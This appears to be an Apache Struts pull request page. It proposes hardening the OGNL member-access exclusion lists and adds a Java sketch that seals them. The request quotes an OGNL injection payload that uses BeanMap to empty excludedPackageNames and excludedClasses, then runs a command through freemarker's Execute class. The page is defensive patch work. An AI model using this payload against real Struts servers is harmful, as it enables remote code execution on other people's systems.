
[WW-5186]protect excludedClasses and excludedPackageNames

Open k4n5ha0 opened this issue 2 years ago • 1 comment

Block unknown exploits that clear excludedPackageNames and excludedClasses if an attacker uses 'excluded'+'PackageNames' like below; this patch can protect Struts.

%{
(#request.a=#@org.apache.commons.collections.BeanMap@{}) +
(#request.a.setBean(#request.get('struts.valueStack')) == true) +
(#request.b=#@org.apache.commons.collections.BeanMap@{}) +
(#request.b.setBean(#request.get('a').get('context'))) +
(#request.c=#@org.apache.commons.collections.BeanMap@{}) +
(#request.c.setBean(#request.get('b').get('memberAccess'))) +
(#request.get('c').put('excluded'+'PackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet())) +
(#request.get('c').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet())) +
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'calc'}))
}


k4n5ha0, Jun 12 '22 02:06
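As an added illustration of the protection the title asks for (a sketch written for this page, not the PR's patch and not Struts' own SecurityMemberAccess): the exclusion lists are stored as unmodifiable copies and sealed once configuration is loaded, so a setter reached by property name, the way a BeanMap put reaches it, and a clear() on the returned set both fail. The class and method names are assumptions.

```java
import java.beans.PropertyDescriptor;
import java.lang.reflect.InvocationTargetException;
import java.util.Collections;
import java.util.HashSet;
import java.util.Set;

/** Hypothetical stand-in for a member-access policy; not Struts' SecurityMemberAccess. */
final class HardenedMemberAccess {
    private Set<String> excludedClasses = Collections.emptySet();
    private Set<String> excludedPackageNames = Collections.emptySet();
    private boolean sealed; // once true, no setter may change the lists again

    // Getters hand out unmodifiable views, so a caller holding the set cannot clear it.
    public Set<String> getExcludedClasses() { return excludedClasses; }
    public Set<String> getExcludedPackageNames() { return excludedPackageNames; }

    public void setExcludedClasses(Set<String> classes) {
        checkNotSealed();
        excludedClasses = Collections.unmodifiableSet(new HashSet<>(classes));
    }
    public void setExcludedPackageNames(Set<String> packages) {
        checkNotSealed();
        excludedPackageNames = Collections.unmodifiableSet(new HashSet<>(packages));
    }
    /** Called once after configuration is loaded; later setter calls are rejected. */
    public void seal() { sealed = true; }
    private void checkNotSealed() {
        if (sealed) throw new IllegalStateException("exclusion lists are sealed after startup");
    }
}

public class SealDemo {
    public static void main(String[] args) throws Exception {
        HardenedMemberAccess access = new HardenedMemberAccess();
        access.setExcludedPackageNames(Set.of("java.lang.reflect", "freemarker.template.utility")); // constructed sample
        access.seal();
        // A write by property name, which is how a BeanMap-style put reaches the setter.
        PropertyDescriptor pd = new PropertyDescriptor("excludedPackageNames", HardenedMemberAccess.class);
        try {
            pd.getWriteMethod().invoke(access, Collections.emptySet());
            System.out.println("UNEXPECTED: setter accepted an empty list after seal()");
        } catch (InvocationTargetException e) {
            System.out.println("setter rejected: " + e.getCause().getMessage());
        }
        // Mutating the returned set directly fails as well.
        try {
            access.getExcludedPackageNames().clear();
        } catch (UnsupportedOperationException e) {
            System.out.println("view is read-only; list still has " + access.getExcludedPackageNames().size() + " entries");
        }
    }
}
```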


Coverage increased (+0.003%) to 50.637% when pulling 3a7cc3db62dc914ea47d94539d549c2ee2791c91 on k4n5ha0:patch-7 into 4b3ee53f939ac040b6d5351591eace6023d78514 on apache:master.

coveralls, Jun 12 '22 02:06